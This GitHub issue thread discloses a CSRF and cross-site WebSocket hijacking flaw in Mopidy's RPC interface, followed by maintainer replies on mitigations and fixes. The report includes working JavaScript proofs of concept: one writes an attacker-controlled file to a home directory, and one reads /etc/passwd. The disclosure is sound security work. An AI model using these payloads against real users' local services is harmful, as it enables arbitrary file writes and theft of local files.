### ISSUE TITLE
The RPC interface is not protected against CSRF

### ISSUE THREAD

**Issue by atx** [mopidy/mopidy#1659]
I noticed that the Mopidy HTTP RPC interface is not protected against CSRF.
A malicious website can therefore make arbitrary RPC calls.

This can be used, for instance, with the core.playlists.save method to write
a file with reasonably flexible attacker provided content to any local path.

```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1:6680/mopidy/rpc");

var content = {
  "__model__": "Playlist",
  "last_modified": 0,
  "name": "evil_bashrc",
  "tracks": [
    {
      "__model__": "Track",
      "name": "\necho Hi!\n",
      "uri": "file:///doesnt/mater"
    }
  ],
  "uri": "m3u:///home/user/evil_bashrc"
};

var rpc = {
  "method": "core.playlists.save",
  "params": [content],
  "jsonrpc": "2.0",
  "id": 1,
};

xhr.send(JSON.stringify(rpc));
```

The websocket interface is also unprotected, which makes retrieving call
results easy (though otherwise it should still be possible to use DNS rebinding).
This can be used to retrieve almost arbitrary text-based files using the
core.playlists.get_items method.

_Just binding to localhost simply isn't sufficient, as any visited website
is completely free to send POST requests/make websocket connections to a localhost
URL._

An example reading /etc/passwd follows (full version hosted on http://arya.atx.name/mopidy.html).

```javascript
var ws = new WebSocket("ws://127.0.0.1:6680/mopidy/ws");

ws.onopen = function() {
  var msg = {
    method: "core.playlists.get_items",
    params: ["m3u:///etc/passwd"],
    jsonrpc: "2.0",
    id: 1
  }
  ws.send(JSON.stringify(msg));
}

ws.onmessage = function(ev) {
  console.log(ev.data);
}
```

Some recent related reading:

https://github.com/spesmilo/electrum/issues/3374
http://www.christian-schneider.net/CrossSiteWebSocketHijacking.html
https://github.com/transmission/transmission/pull/468

Bonus observation:
The MPD-compatible interface does not seem to filter HTTP requests. This could also be problematic, but I haven't had time to look into it. Related reading:

https://bouk.co/blog/hacking-developers/
https://sourceforge.net/p/openocd/mailman/openocd-devel/thread/270e864949d7dcbac4695d42d2b9bba5%40atx.name/#msg36188041

(MPD itself kills the connection on encountering the ':' in "Host: ...")

_Note: I originally sent this a few weeks ago as an email to a bunch of people from the Mopidy org., but received no reply (likely got spamfiltered, Google seems to hate me)_

**Comment by adamcik** [comment]
Thank you for raising this issue and for trying to reach out to Mopidy developers before creating this issue. It's clear we need to create a procedure for how to contact us regarding potential security issues.

As for the issues raised, there are a number of separate issues to follow up on here (we'll be filing additional issues as needed).

- M3U backend's arbitrary file access is a bug, and needs to be fixed as soon as possible.
- WebSocket and HTTP API endpoints need to do origin checks as a minimum.
- Cross-site request forgery protection will not happen short term without contributions.
- Sending HTTP to MPD should be followed up further.

For anyone following along, to mitigate the M3U backend issue we suggest disabling it (set the `m3u/enabled` config value to `false` in your Mopidy configuration). Likewise, if you don't use Mopidy’s HTTP server, it can safely be disabled (set `http/enabled` to `false`) to disable the WebSocket and HTTP API endpoints.

**Comment by jodal** [comment]
With the merge of PR #1668 the CSRF attack vector on the RPC and WebSocket API should be fixed.

Remaining here then is:

- M3U backend's arbitrary file access
- MPD frontend not rejecting HTTP requests early

**Comment by jodal** [comment]
I've filed a separate issue, #1684, for the MPD part, as we won't tackle that right away.
